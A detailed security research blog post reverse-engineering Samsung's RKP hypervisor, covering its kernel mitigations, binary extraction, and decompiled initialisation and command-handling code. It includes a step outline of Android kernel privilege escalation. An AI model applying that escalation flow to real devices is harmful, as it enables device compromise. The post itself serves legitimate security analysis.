impalabs space base graphics
A Samsung RKP Compendium

The purpose of this blog post is to provide a comprehensive reference of the inner workings of the Samsung RKP. It enables anyone to start poking at this obscure code that is executing at a high privilege level on their device. In addition, a now-fixed vulnerability that allowed getting code execution in Samsung RKP is revealed. It is a good example of a simple mistake that compromises platform security, as the exploit consists of a single call, which is all it takes to make hypervisor memory writable from the kernel.

In the first part, we will talk briefly about Samsung's kernel mitigations (that probably deserve a blog post of their own). In the second part, we will explain how to get your hands on the RKP binary for your device.

In the third part, we will start taking apart the hypervisor framework that supports RKP on the Exynos devices, before digging into the internals of RKP in the fourth part. We will detail how it is started, how it processes the kernel page tables, how it protects sensitive data structures, and finally, how it enables the kernel mitigations.

In the fifth and last part, we will reveal the vulnerability, the one-liner exploit, and take a look at the patch.

Introduction

In the mobile device world, security traditionally relied on kernel mechanisms. But history has shown us that the kernel was far from being unbreakable. For most Android devices, finding a kernel vulnerability allows an attacker to modify sensitive kernel data structures, elevate privileges, and execute malicious code.

It is also simply not enough to ensure kernel integrity at boot time (using the Verified Boot mechanism). Kernel integrity must also be verified at run time. This is what a security hypervisor aims to do. RKP, standing for Real-time Kernel Protection, is the name of Samsung's hypervisor implementation, which is part of Samsung KNOX.

There is already a lot of great research that has been done on Samsung RKP, specifically Gal Beniamini's Lifting the (Hyper) Visor: Bypassing Samsung’s Real-Time Kernel Protection and Aris Thallas's On emulating hypervisors: a Samsung RKP case study which we both highly recommend that you read before this blog post.

Kernel Exploitation

A typical local privilege escalation (LPE) flow on Android involves:

  • bypassing KASLR by leaking a kernel pointer;
  • getting a one-off arbitrary kernel memory read/write;
  • using it to overwrite a kernel function pointer;
  • calling a function to set the address_limit to -1;
  • bypassing SELinux by writing selinux_(enable|enforcing);
  • escalating privileges by writing the uid, gid, sid, capabilities, etc.

Samsung has implemented mitigations to try and make that task as hard as possible for an attacker: JOPP, ROPP and KDP are three of them. Not all Samsung devices have the same mitigations in place, though.

Here is what we observed after downloading various firmware updates:

Device Region JOPP ROPP KDP
Low-end International No No Yes
Low-end United States No No Yes
High-end International Yes No Yes
High-end United States Yes Yes Yes

JOPP

Jump-Oriented Programming Prevention (JOPP) aims to prevent JOP. It is a homemade CFI solution. It begins by inserting a NOP instruction before each function's start using a modified compiler toolchain. It then uses a Python script (scripts/rkp_cfp/instrument.py) to process the compiled kernel binary: NOPs are replaced with a magic value (0xbe7bad) and indirect branches with a direct branch to a helper function.

The helper function jopp_springboard_blr_rX (in init/rkp_cfp.S) will check if the value before the target matches the magic value and take the jump if it does, or crash if it doesn't:

    .macro  springboard_blr, reg
    jopp_springboard_blr_\reg:
    push    RRX, xzr
    ldr RRX_32, [\reg, #-4]
    subs    RRX_32, RRX_32, #0xbe7, lsl #12
    cmp RRX_32, #0xbad
    b.eq    1f
    ...
    inst    0xdeadc0de //crash for sure
    ...
1:
    pop RRX, xzr
    br  \reg
    .endm

ROPP

Return-Oriented Programming Prevention (ROPP) aims to prevent ROP. It is a homemade "stack canary". It uses the same modified compiler toolchain to emit NOP instructions before stp x29, x30 instructions and after ldp x29, x30 instructions, and to prevent allocation of registers X16 and X17. It then uses the same Python script to replace the prologues and epilogues of assembled C functions like so:

    nop
    stp x29, x30, [sp,#-<frame>]!
    (insns)
    ldp x29, x30, ...
    nop

is replaced by

    eor RRX, x30, RRK
    stp x29, RRX, [sp,#-<frame>]!
    (insns)
    ldp x29, RRX, ...
    eor x30, RRX, RRK

where RRX is an alias for X16 and RRK for X17.

RRK is called the "thread key" and is unique to each kernel task. Instead of directly pushing the return address onto the stack, they XOR it with this key first, preventing an attacker from changing the return address without knowledge of the thread key.

The thread key itself is stored in the rrk field of the thread_info structure, but XORed with the RRMK.

struct thread_info {
    // ...
    unsigned long rrk;
};

RRMK is called the "master key". On production devices, it is stored in the system register Debug Breakpoint Control Register 5 (DBGBCR5_EL1). It is set by the hypervisor during kernel initialization, as we will see later.

KDP

Kernel Data Protection (KDP) is another hypervisor-enabled mitigation. It is a homemade Data Flow Integrity (DFI) solution. It makes sensitive kernel data structures (like the page tables, struct cred, struct task_security_struct, struct vfsmount, SELinux status, etc.) read-only thanks to the hypervisor.

Getting Started

Hypervisor Crash Course

For understanding Samsung RKP, you will need some basic knowledge about the virtualization extensions on ARMv8 platforms. We recommend that you read the section "HYP 101" of Lifting the (Hyper) Visor or the section "ARM Architecture & Virtualization Extensions" of On emulating hypervisors.

An hypervisor, to paraphrase these chapters, executes at a higher privilege level than the kernel, giving it complete control over it. Here is what the architecture looks like on ARMv8 platforms:

image

The hypervisor can receive calls from the kernel via the Hypervisor Call (HVC) instruction. Moreover, by using the Hypervisor Configuration Register (HCR), the hypervisor can trap critical operations usually handled by the kernel (access to virtual memory control registers, etc.) and also handle general exceptions.

Finally, the hypervisor is taking advantage of a second layer of address translation, called "stage 2 translation". In the standard "stage 1 translation", a Virtual Address (VA) is translated into Intermediate Physical Address (IPA). Then this IPA is translated into the final Physical Address (PA) by the second stage.

Here is what the address translation looks like with 2-stage address translation enabled:

image

The hypervisor still only has a single-stage address translation for its own memory accesses.

Our Research Platform

To make it easier to get started with this research, we have been using a bootloader-unlocked Samsung A51 (SM-A515F) instead of a full exploit chain. We have downloaded the kernel source code for our device from the Samsung Open Source website, modified it, and recompiled it (which did not work out of the box).

For this research, we have implemented new syscalls:

  • kernel memory allocation/freeing;
  • arbitrary read/write of kernel memory;
  • hypervisor call (using the uh_call function).

These syscalls make it really convenient to interact with RKP as you will see in the exploitation section: we just need to write a piece of C code (or Python) that will execute in userland and perform whatever we want.

Extracting the Binary

RKP is implemented for both Exynos and Snapdragon-equipped devices, and both implementations share a lot of code. However, most, if not all, of the existing research has been done on the Exynos variant, as it is the most straightforward to dig into: RKP is available as a standalone binary. On Snapdragon devices, it is embedded inside the Qualcomm Hypervisor Execution Environment (QHEE) image, which is very large and complicated.

Exynos Devices

On Exynos devices, RKP used to be embedded directly into the kernel binary, and so it could be found as the vmm.elf file in the kernel source archives. Around late 2017/early 2018, VMM was rewritten into a new framework called uH, which most likely stands for "micro-hypervisor". Consequently, the binary has been renamed to uh.elf and can still be found in the kernel source archives for a few devices.

Because of Gal Beniamini's first suggested design improvements, on most devices, RKP has been moved out of the kernel binary and into a partition of its own called uh. That makes it even easier to extract, for example by grabbing it from the BL_xxx.tar archive contained in a firmware update (it is usually LZ4-compressed and starts with a 0x1000-byte header that needs to be stripped to get to the real ELF file).

The architecture has changed slightly on the S20 and later devices, as Samsung has introduced another framework to support RKP (called H-Arx), most likely to unify even more the code base with the Snapdragon devices, and it also features more uH "apps". However, we won't be taking a look at it in this blog post.

Snapdragon Devices

On Snapdragon devices, RKP can be found in the hyp partition and can also be extracted from the BL_xxx.tar archive in a firmware update. It is one of the segments that make up the QHEE image.

The main difference with Exynos devices is that it is QHEE that sets the page tables and the exception vector. As a result, it is QHEE that notifies uH when exceptions happen (HVC or trapped system register), and uH has to make a call to QHEE when it wants to modify the page tables. The rest of the code is almost identical.

Symbols and Log Strings

Back in 2017, the RKP binary was shipped with symbols and log strings. But that isn't the case anymore. Nowadays, the binaries are stripped, and the log strings are replaced with placeholders (like Qualcomm does). Nevertheless, we tried getting our hands on as many binaries as possible, hoping that Samsung did not do that for all of their devices, as is sometimes the case with other OEMs.

By mass downloading firmware updates for various Exynos devices, we gathered around 300 unique hypervisor binaries. None of the uh.elf files had symbols, so we had to manually port them over from the old vmm.elf files. Some of the uh.elf files had the full log strings, the latest being from Apr 9 2019.

With the full log strings and their hashed version, we could figure out that the hash value is simply the truncation of SHA256's output. Here is a Python one-liner to calculate the hash, in case you need it:

hashlib.sha256(log_string).hexdigest()[:8]

Hypervisor Framework

The uH framework acts as a micro-OS, of which RKP is an application. This is really more of a way to organize things, as "apps" are simply a bunch of command handlers and don't have any kind of isolation.

Utility Structures

Before digging into the code, we will briefly tell you about the utility structures that are used extensively by uH and the RKP app. We won't be detailing their implementation, but it is important to understand what they do.

Memlists

The memlist_t structure is a list of address ranges, a sort of specialized version of a C++ vector (it has a capacity and a size).

typedef struct memlist_entry {
  uint64_t addr;
  uint64_t size;
  uint64_t unkn_10;
  uint64_t extra;
} memlist_entry_t;
typedef struct memlist {
  memlist_entry_t* base;
  uint32_t capacity;
  uint32_t count;
  uint32_t merged;
  crit_sec_t cs;
} memlist_t;

There are functions to add and remove address ranges from a memlist, to check if an address is contained in a memlist, if an address range overlaps with a memlist, etc.

Sparsemaps

The sparsemap_t structure is a map that associates values with addresses. It is created from a memlist and will map all the addresses in this memlist to a value. The size of this value is determined by the bit_per_page field.

typedef struct sparsemap_entry {
  uint64_t addr;
  uint64_t size;
  uint64_t bitmap_size;
  uint8_t* bitmap;
} sparsemap_entry_t;
typedef struct sparsemap {
  char name[8];
  uint64_t start_addr;
  uint64_t end_addr;
  uint64_t count;
  uint64_t bit_per_page;
  uint64_t mask;
  crit_sec_t cs;
  memlist_t* list;
  sparsemap_entry_t* entries;
  uint32_t private;
  uint32_t unkn_54;
} sparsemap_t;

There are functions to get and set the value for each entry of the map, etc.

Critical Sections

The crit_sec_t structure is used to implement critical sections.

typedef struct crit_sec {
  uint32_t cpu;
  uint32_t lock;
  uint64_t lr;
} crit_sec_t;

And of course, there are functions to enter and exit the critical sections.

System Initialization

uH/RKP is loaded into memory by the Samsung Bootloader (S-Boot). S-Boot jumps to the EL2 entry-point by asking the secure monitor (running at EL3) to start executing hypervisor code at the address it specifies.

uint64_t cmd_load_hypervisor() {
  // ...

  part = FindPartitionByName("UH");
  if (part) {
    dprintf("%s: loading uH image from %d..\n", "f_load_hypervisor", part->block_offset);
    ReadPartition(&hdr, part->file_offset, part->block_offset, 0x4c);
    dprintf("[uH] uh page size = 0x%x\n", (((hdr.size - 1) >> 12) + 1) << 12);
    total_size = hdr.size + 0x1210;
    dprintf("[uH] uh total load size = 0x%x\n", total_size);
    if (total_size > 0x200000 || hdr.size > 0x1fedf0) {
      dprintf("Could not do normal boot.(invalid uH length)\n");
      // ...
    }
    ret = memcmp_s(&hdr, "GREENTEA", 8);
    if (ret) {
      ret = -1;
      dprintf("Could not do uh load. (invalid magic)\n");
      // ...
    } else {
      ReadPartition(0x86fff000, part->file_offset, part->block_offset, total_size);
      ret = pit_check_signature(part->partition_name, 0x86fff000, total_size);
      if (ret) {
        dprintf("Could not do uh load. (invalid signing) %x\n", ret);
        // ...
      }
      load_hypervisor(0xc2000400, 0x87001000, 0x2000, 1, 0x87000000, 0x100000);
      dprintf("[uH] load hypervisor\n");
    }
  } else {
    ret = -1;
    dprintf("Could not load uH. (invalid ppi)\n");
    // ...
  }
  return ret;
}

void load_hypervisor(...) {
  dsb();
  asm("smc #0");
  isb();
}

Please note that on recent Samsung devices, the monitor code, based on the ARM Trusted Firmware (ATF), is no longer in plain-text in the S-Boot binary. In its place, one can find an encrypted blob. A vulnerability in Samsung's Trusted OS implementation (TEEGRIS) will need to be found so that plain-text monitor code can be dumped.

The address translation process for EL1 accesses has two stages, whereas the AT process for EL2 accesses only has one. In the hypervisor code, stage 1 (abbreviated s1) refers to the first stage of the EL2 AT process that governs hypervisor accesses. Stage 2 (abbreviated s2) refers to the second stage of the EL1 AT process that governs kernel accesses.

Execution starts in the default function. This function checks if it is running at EL2 before calling main. Once main returns, it makes an SMC, presumably to give control back to S-Boot.

void default(...) {
  // ...

  if (get_current_el() == (0b10 /* EL2 */ << 2)) {
    // Save registers x0 to x30, sp_el1, elr_el2, spsr_el2.
    // ...
    // Reset the .bss section.
    memset(&rkp_bss_start, 0, 0x1000);
    main(saved_regs.x0, saved_regs.x1, &saved_regs);
  }
  // Return to S-Boot after initialization.
  asm("smc #0");
}

After disabling the alignment checks and making sure the binary is loaded at the expected address (0x87000000 for this binary), main sets TTBR0_EL2 to its initial page tables and calls s1_enable to enable address translation at EL2. The initial page tables for EL2, embedded directly in the hypervisor binary, contain a 1:1 mapping of the uH region.

int32_t main(int64_t x0, int64_t x1, saved_regs_t* regs) {
  // ...

  // SCTLR_EL2, System Control Register (EL2).
  //
  //   - A,  bit [1] = 0: Alignment fault checking disabled.
  //   - SA, bit [3] = 0: SP Alignment check disabled.
  set_sctlr_el2(get_sctlr_el2() & 0xfffffff5);
  // Prevent the hypervisor from being initialized twice.
  if (!initialized) {
    initialized = 1;
    // Check if the loading address is as expected.
    if (&hyp_base != 0x87000000) {
      uh_log('L', "slsi_main.c", 326, "[-] static s1 mmu mismatch");
      return -1;
    }
    // Set the EL2 page tables start address.
    set_ttbr0_el2(&static_s1_page_tables_start__);
    // Enable the EL2 address translation.
    s1_enable();
    // Initialize the hypervisor.
    uh_init(0x87000000, 0x200000);
    // Initialize the virtual memory manager (VMM).
    if (vmm_init()) {
      return -1;
    }
    uh_log('L', "slsi_main.c", 338, "[+] vmm initialized");
    // Set the second stage EL1 page tables start address.
    set_vttbr_el2(&static_s2_page_tables_start__);
    uh_log('L', "slsi_main.c", 348, "[+] static s2 mmu initialized");
    // Enable the second stage of EL1 address translation.
    s2_enable();
    uh_log('L', "slsi_main.c", 351, "[+] static s2 mmu enabled");
  }
  uh_log('L', "slsi_main.c", 355, "[*] initialization completed");
  return 0;
}

s1_enable sets mostly cache-related fields of MAIR_EL2, TCR_EL2, and SCTLR_EL2, and most importantly, enables the MMU for the EL2. main then calls the uh_init function and passes it the uH memory range. It seems that Gal Beniamini's second suggested design improvement, setting the WXN bit to 1, has also been implemented by the Samsung KNOX team.

void s1_enable() {
  // ...

  cs_init(&s1_lock);
  // MAIR_EL2, Memory Attribute Indirection Register (EL2).
  //
  //   - Attr0, bits[7:0]   = 0xff: Normal memory, Outer & Inner Write-Back Non-transient, Outer & Inner Read-Allocate
  //                                Write-Allocate).
  //   - Attr1, bits[15:8]  = 0x00: Device-nGnRnE memory.
  //   - Attr2, bits[23:16] = 0x44: Normal memory, Outer & Inner Write-Back Transient, Outer & Inner No Read-Allocate No
  //                                Write-Allocate).
  set_mair_el2(get_mair_el2() & 0xffffffffff000000 | 0x4400ff);
  // TCR_EL2, Translation Control Register (EL2).
  //
  //   - T0SZ,  bits [5:0]   = 24: TTBR0_EL2 region size is 2^40.
  //   - IRGN0, bits [9:8]   = 0b11: Normal memory, Outer & Inner Write-Back Read-Allocate No Write-Allocate Cacheable.
  //   - ORGN0, bits [11:10] = 0b11: Normal memory, Outer & Inner Write-Back Read-Allocate No Write-Allocate Cacheable.
  //   - SH0,   bits [13:12] = 0b11: Inner Shareable.
  //   - PS,    bits [18:16] = 0b010: PA size is 40 bits, 1TB.
  set_tcr_el2(get_tcr_el2() & 0xfff8c0c0 | 0x23f18);
  flush_entire_cache();
  sctlr_el2 = get_sctlr_el2();
  // SCTLR_EL2, System Control Register (EL2).
  //
  //   - C, bit [2] = 1: data is cacheable for EL2.
  //   - I, bit [12] = 1: instruction access is cacheable for EL2.
  //   - WXN, bit [19] = 1: writeable implies non-executable for EL2.
  set_sctlr_el2(sctlr_el2 & 0xfff7effb | 0x81004);
  invalidate_entire_s1_el2_tlb();
  //   - M, bit [0] = 1: EL2 stage 1 address translation enabled.
  set_sctlr_el2(sctlr_el2 & 0xfff7effa | 0x81005);
}

After saving the arguments into a global control structure called uh_state, uh_init calls static_heap_initialize. This function also saves its arguments into global variables and initializes the doubly linked list of heap chunks with a single free chunk spanning over the hypervisor memory range.

uh_init then calls static_heap_remove_range to remove three important ranges from the memory that can be returned by the static heap allocator (effectively splitting the original chunk into multiple ones):

  • the log region;
  • the uH (code/data/bss/stack) region;
  • the "bigdata" (analytics) region.
int64_t uh_init(int64_t uh_base, int64_t uh_size) {
  // ...

  // Reset the global state of the hypervisor.
  memset(&uh_state.base, 0, sizeof(uh_state));
  // Save the hypervisor base address and size.
  uh_state.base = uh_base;
  uh_state.size = uh_size;
  // Initialize the static heap with the whole hypervisor memory.
  static_heap_initialize(uh_base, uh_size);
  // But remove the log, uH and bigdata regions from it.
  if (!static_heap_remove_range(0x87100000, 0x40000) || !static_heap_remove_range(&hyp_base, 0x87046000 - &hyp_base) ||
      !static_heap_remove_range(0x870ff000, 0x1000)) {
    uh_panic();
  }
  // Initialize the log region.
  memory_init();
  uh_log('L', "main.c", 131, "================================= LOG FORMAT =================================");
  uh_log('L', "main.c", 132, "[LOG:L, WARN: W, ERR: E, DIE:D][Core Num: Log Line Num][File Name:Code Line]");
  uh_log('L', "main.c", 133, "==============================================================================");
  uh_log('L', "main.c", 134, "[+] uH base: 0x%p, size: 0x%lx", uh_state.base, uh_state.size);
  uh_log('L', "main.c", 135, "[+] log base: 0x%p, size: 0x%x", 0x87100000, 0x40000);
  uh_log('L', "main.c", 137, "[+] code base: 0x%p, size: 0x%p", &hyp_base, 0x46000);
  uh_log('L', "main.c", 139, "[+] stack base: 0x%p, size: 0x%p", stacks, 0x10000);
  uh_log('L', "main.c", 143, "[+] bigdata base: 0x%p, size: 0x%p", 0x870ffc40, 0x3c0);
  uh_log('L', "main.c", 152, "[+] date: %s, time: %s", "Feb 27 2020", "17:28:58");
  uh_log('L', "main.c", 153, "[+] version: %s", "UH64_3b7c7d4f exynos9610");
  // Register the command handlers for the INIT app.
  uh_register_commands(0, init_cmds, 0, 5, 1);
  // Register the command handlers for the RKP app.
  j_rkp_register_commands();
  uh_log('L', "main.c", 370, "%d app started", 1);
  // Initialize the INIT app.
  system_init();
  // Initialize the other apps (including the RKP app).
  apps_init();
  // Initialize the bigdata region.
  uh_init_bigdata();
  // Initialize the context buffer.
  uh_init_context();
  // Create the memlist of memory regions used by the dynamic heap allocator.
  memlist_init(&uh_state.dynamic_regions);
  // Create and fill the memlist of protected ranges (critical memory regions).
  pa_restrict_init();
  // Mark the hypervisor as initialized.
  uh_state.inited = 1;
  uh_log('L', "main.c", 427, "[+] uH initialized");
  return 0;

uh_init then calls memory_init which zeroes out the log region and maps it into the EL2 page tables. This region will be used by the printf-like string printing functions, which are called inside of the uh_log function.

int64_t memory_init() {
  // Reset the log region.
  memory_buffer = 0x87100000;
  memset(0x87100000, 0, 0x40000);
  cs_init(&memory_cs);
  clean_invalidate_data_cache_region(0x87100000, 0x40000);
  memory_buffer_index = 0;
  memory_active = 1;
  // Map it into the hypervisor page tables as writable.
  return s1_map(0x87100000, 0x40000, UNKN3 | WRITE | READ);
}

uh_init then logs various information using uh_log (these messages can be retrieved from /proc/uh_log on the device). uh_init then calls uh_register_commands and rkp_register_commands (which ends up calling uh_register_commands but with a different set of arguments).

uh_register_commands takes as arguments the application ID, an array of command handlers, an optional command "checker" function, the number of commands in the array, and a debug flag. These values will be stored in the fields cmd_evtable, cmd_checkers, cmd_counts, and cmd_flags of the uh_state structure and will be used to handle hypervisor calls coming from the kernel.

int64_t uh_register_commands(uint32_t app_id,
                             int64_t cmd_array,
                             int64_t cmd_checker,
                             uint32_t cmd_count,
                             uint32_t flag) {
  // ...

  // Ensure the hypervisor hasn't already been initialized.
  if (uh_state.inited) {
    uh_log('D', "event.c", 11, "uh_register_event is not permitted after uh_init : %d", app_id);
  }
  // Perform sanity-checking on the application ID.
  if (app_id >= 8) {
    uh_log('D', "event.c", 14, "wrong app_id %d", app_id);
  }
  // Save the arguments into the `uh_state` global variable.
  uh_state.cmd_evtable[app_id] = cmd_array;
  uh_state.cmd_checkers[app_id] = cmd_checker;
  uh_state.cmd_counts[app_id] = cmd_count;
  uh_state.cmd_flags[app_ip] = flag;
  uh_log('L', "event.c", 21, "app_id:%d, %d events and flag(%d) has registered", app_id, cmd_count, flag);
  // The "command checker" is optional.
  if (cmd_checker) {
    uh_log('L', "event.c", 24, "app_id:%d, cmd checker enforced", app_id);
  }
  return 0;
}

According to the kernel sources, there are only 3 applications defined, even though uH technically supports up to 8.

  • APP_INIT, which is used by S-Boot during initialization;
  • APP_SAMPLE, which is unused;
  • APP_RKP, which is used by the kernel to interact with RKP.
#define APP_INIT    0
#define APP_SAMPLE  1
#define APP_RKP     2

#define UH_PREFIX  UL(0xc300c000)
#define UH_APPID(APP_ID)  ((UL(APP_ID) & UL(0xFF)) | UH_PREFIX)

enum __UH_APP_ID {
    UH_APP_INIT     = UH_APPID(APP_INIT),
    UH_APP_SAMPLE   = UH_APPID(APP_SAMPLE),
    UH_APP_RKP  = UH_APPID(APP_RKP),
};

uh_init then calls system_init and apps_init. These functions call the command handler #0 of the corresponding app(s): system_init of APP_INIT and apps_init of all the other registered applications. In our case, it will end up calling init_cmd_init and rkp_cmd_init, respectively.

uint64_t system_init() {
  // ...

  memset(&saved_regs, 0, sizeof(saved_regs));
  // Call the command handler #0 of APP_INIT.
  res = uh_handle_command(0, 0, &saved_regs);
  if (res) {
    uh_log('D', "main.c", 380, "system init failed %d", res);
  }
  return res;
}
uint64_t apps_init() {
  // ...

  memset(&saved_regs, 0, sizeof(saved_regs));
  // Iterate on all applications but APP_INIT.
  for (i = 1; i != 8; ++i) {
    // Ensure the application is registered.
    if (uh_state.cmd_evtable[i]) {
      uh_log('W', "main.c", 393, "[+] dst %d initialized", i);
      // Call the command handler #0 of the application.
      res = uh_handle_command(i, 0, &saved_regs);
      if (res) {
        uh_log('D', "main.c", 396, "app init failed %d", res);
      }
    }
  }
  return res;
}

uh_handle_command prints the app ID, command ID, and its arguments if the debug flag was set, calls the command checker function if any, and then calls the appropriate command handler.

int64_t uh_handle_command(uint64_t app_id, uint64_t cmd_id, saved_regs_t* regs) {
  // ...

  // If debug is enabled, log the command to be handled.
  if ((uh_state.cmd_flags[app_id] & 1) != 0) {
    uh_log('L', "main.c", 441, "event received %lx %lx %lx %lx %lx %lx", app_id, cmd_id, regs->x2, regs->x3, regs->x4,
           regs->x5);
  }
  // If a "command checker" is registered for the application, call it.
  cmd_checker = uh_state.cmd_checkers[app_id];
  if (cmd_id && cmd_checker && cmd_checker(cmd_id)) {
    uh_log('E', "main.c", 448, "cmd check failed %d %d", app_id, cmd_id);
    return -1;
  }
  // Perform sanity-checking on the application ID.
  if (app_id >= 8) {
    uh_log('D', "main.c", 453, "wrong dst %d", app_id);
  }
  // Ensure the destination application is registered.
  if (!uh_state.cmd_evtable[app_id]) {
    uh_log('D', "main.c", 456, "dst %d evtable is NULL\n", app_id);
  }
  // Perform sanity-checking on the command ID.
  if (cmd_id >= uh_state.cmd_counts[app_id]) {
    uh_log('D', "main.c", 459, "wrong type %lx %lx", app_id, cmd_id);
  }
  // Get the actual command handler.
  cmd_handler = uh_state.cmd_evtable[app_id][cmd_id];
  if (!cmd_handler) {
    uh_log('D', "main.c", 464, "no handler %lx %lx", app_id, cmd_id);
    return -1;
  }
  // And finally, call it.
  return cmd_handler(regs);
}

uh_init then calls uh_init_bigdata and uh_init_context.

uh_init_bigdata allocates and zeroes out the buffers used by the analytics feature. It also makes the bigdata region accessible as read/write in the EL2 page tables.

int64_t uh_init_bigdata() {
  // Allocate a buffer to store the analytics collected.
  if (!bigdata_state) {
    bigdata_state = malloc(0x230, 0);
  }
  // Reset this buffer and the bigdata global state.
  memset(0x870ffc40, 0, 960);
  memset(bigdata_state, 0, 560);
  // Map this buffer into the hypervisor as writable.
  return s1_map(0x870ff000, 0x1000, UNKN3 | WRITE | READ);
}

uh_init_context allocates and zeroes out a buffer that is used to store the hypervisor registers on platform resets (we don't know where it is used, maybe by the monitor to restore the hypervisor state on some event).

int64_t* uh_init_context() {
  // ...

  // Allocate a buffer to store the processor context.
  uh_context = malloc(0x1000, 0);
  if (!uh_context) {
    uh_log('W', "RKP_1cae4f3b", 21, "%s RKP_148c665c", "uh_init_context");
  }
  // Reset this buffer.
  return memset(uh_context, 0, 0x1000);
}

uh_init calls memlist_init to initialize the dynamic_regions memlist in the uh_state structure, which will contain the memory regions that can be used by the dynamic allocator, and then calls the pa_restrict_init function.

pa_restrict_init initializes the protected_ranges memlist, which contains the critical hypervisor memory regions that should be protected, and adds the hypervisor memory region to it. It also checks that rkp_cmd_counts and the protected_ranges structures are contained in the memlist as they should be.

int64_t pa_restrict_init() {
  // Initialize the memlist of protected ranges.
  memlist_init(&protected_ranges);
  // Add the uH memory region to it (containing the hypervisor code and data).
  protected_ranges_add(0x87000000, 0x200000);
  // Sanity-check: it must contain the `rkp_cmd_counts` array.
  if (!protected_ranges_contains(&rkp_cmd_counts)) {
    uh_log('D', "pa_restrict.c", 79, "Error, cmd_cnt not within protected range, cmd_cnt addr : %lx", rkp_cmd_counts);
  }
  // Sanity-check: it must also contain itself.
  if (!protected_ranges_contains(&protected_ranges)) {
    uh_log('D', "pa_restrict.c", 84, "Error protect_ranges not within protected range, protect_ranges addr : %lx",
           &protected_ranges);
  }
  return uh_log('L', "pa_restrict.c", 87, "[+] uH PA Restrict Init");
}

uh_init returns to main, which then calls vmm_init to initialize the virtual memory management system at EL1.

vmm_init sets the VBAR_EL2 register to the exception vector containing the hypervisor functions to be called to handle exceptions, and enables trapping of accesses to the virtual memory control registers at EL1.

int64_t vmm_init() {
  // ...

  uh_log('L', "vmm.c", 142, ">>vmm_init<<");
  cs_init(&stru_870355E8);
  cs_init(&panic_cs);
  // Set the vector table of the hypervisor.
  set_vbar_el2(&vmm_vector_table);
  // HCR_EL2, Hypervisor Configuration Register.
  //
  // TVM, bit [26] = 1: EL1 write accesses to the specified EL1 virtual memory control registers are trapped to EL2.
  hcr_el2 = get_hcr_el2() | 0x4000000;
  uh_log('L', "vmm.c", 161, "RKP_398bc59b %x", hcr_el2);
  set_hcr_el2(hcr_el2);
  return 0;
}

uh_init then sets the VTTBR_EL2 register to the pages tables that will be used for the second stage address translation at EL1. These are the page tables that translate a kernel IPA into an actual PA. Finally, before returning, uh_init calls s2_enable.

s2_enable configures the second stage of address translation and enables it.

void s2_enable() {
  // ...

  cs_init(&s2_lock);
  // VTCR_EL2, Virtualization Translation Control Register.
  //
  //   - T0SZ,  bits [5:0]   = 24: VTTBR_EL2 region size is 2^40.
  //   - SL0,   bits [7:6]   = 0b01: Stage 2 translation lookup start at level 1.
  //   - IRGN0, bits [9:8]   = 0b11: Normal memory, Outer & Inner Write-Back Read-Allocate No Write-Allocate Cacheable.
  //   - ORGN0, bits [11:10] = 0b11: Normal memory, Outer & Inner Write-Back Read-Allocate No Write-Allocate Cacheable.
  //   - SH0,   bits [13:12] = 0b11: Inner Shareable.
  //   - TG0,   bits [15:14] = 0b00: Granule size is 4KB.
  //   - PS,    bits [18:16] = 0b010: PA size is 40 bits, 1TB.
  set_vtcr_el2(get_vtcr_el2() & 0xfff80000 | 0x23f58);
  invalidate_entire_s1_s2_el1_tlb();
  // HCR_EL2, Hypervisor Configuration Register.
  //
  // VM, bit [0] = 1: EL1&0 stage 2 address translation enabled.
  set_hcr_el2(get_hcr_el2() | 1);
  lock_start = 1;
}

App Initialization

We mentioned that uh_init calls the command #0 for each of the registered applications. Let's see what is being executed for the two applications that are used: APP_INIT and APP_RKP.

APP_INIT

The command handlers registered for APP_INIT are:

Command ID Command Handler Maximum Calls
0x00 init_cmd_init -
0x02 init_cmd_add_dynamic_region -
0x03 init_cmd_id_0x03 -
0x04 init_cmd_initialize_dynamic_heap -

Let's take a look at command handler #0 called in uh_init. It is really simple: it sets the fault_handler field of uh_state. This structure contains the address of a kernel function that will be called when a fault is detected by the hypervisor.

int64_t init_cmd_init(saved_regs_t* regs) {
  // ...

  // Ensure the fault handler can only be set once.
  if (!uh_state.fault_handler && regs->x2) {
    // Save the value provided into `uh_state`.
    uh_state.fault_handler = rkp_get_pa(regs->x2);
    uh_log('L', "main.c", 161, "[*] uH fault handler has been registered");
  }
  return 0;
}

When uH calls this command, it won't do anything as the registers, including x2, are all set to 0. But this command will also be called later by the kernel, as can be seen in the rkp_init function in init/main.c.

static void __init rkp_init(void)
{
    uh_call(UH_APP_INIT, 0, uh_get_fault_handler(), kimage_voffset, 0, 0);
    // ...
}

Let's take a look at the fault handler registered by the kernel. It comes from the call to uh_get_fault_handler, which reveals that it is actually the uh_fault_handler function.

u64 uh_get_fault_handler(void)
{
    uh_handler_list.uh_handler = (u64) & uh_fault_handler;
    return (u64) & uh_handler_list;
}

We can see in the definition of the uh_handler_list structure that the argument of the fault handler will be an instance of the uh_handler_data structure, which contains the values of some EL2 system registers as well as the general registers stored in the uh_registers structure.

typedef struct uh_registers {
    u64 regs[31];
    u64 sp;
    u64 pc;
    u64 pstate;
} uh_registers_t;

typedef struct uh_handler_data{
    esr_t esr_el2;
    u64 elr_el2;
    u64 hcr_el2;
    u64 far_el2;
    u64 hpfar_el2;
    uh_registers_t regs;
} uh_handler_data_t;

typedef struct uh_handler_list{
    u64 uh_handler;
    uh_handler_data_t uh_handler_data[NR_CPUS];
} uh_handler_list_t;

The uh_fault_handler function will print information about the fault before calling do_mem_abort and finally panic.

void uh_fault_handler(void)
{
    unsigned int cpu;
    uh_handler_data_t *uh_handler_data;
    u32 exception_class;
    unsigned long flags;
    struct pt_regs regs;

    spin_lock_irqsave(&uh_fault_lock, flags);

    cpu = smp_processor_id();
    uh_handler_data = &uh_handler_list.uh_handler_data[cpu];
    exception_class = uh_handler_data->esr_el2.ec;

    if (!exception_class_string[exception_class]
        || exception_class > esr_ec_brk_instruction_execution)
        exception_class = esr_ec_unknown_reason;
    pr_alert("=============uH fault handler logging=============\n");
    pr_alert("%s",exception_class_string[exception_class]);
    pr_alert("[System registers]\n", cpu);
    pr_alert("ESR_EL2: %x\tHCR_EL2: %llx\tHPFAR_EL2: %llx\n",
         uh_handler_data->esr_el2.bits,
         uh_handler_data->hcr_el2, uh_handler_data->hpfar_el2);
    pr_alert("FAR_EL2: %llx\tELR_EL2: %llx\n", uh_handler_data->far_el2,
         uh_handler_data->elr_el2);

    memset(&regs, 0, sizeof(regs));
    memcpy(&regs, &uh_handler_data->regs, sizeof(uh_handler_data->regs));

    do_mem_abort(uh_handler_data->far_el2, (u32)uh_handler_data->esr_el2.bits, &regs);
    panic("%s",exception_class_string[exception_class]);
}

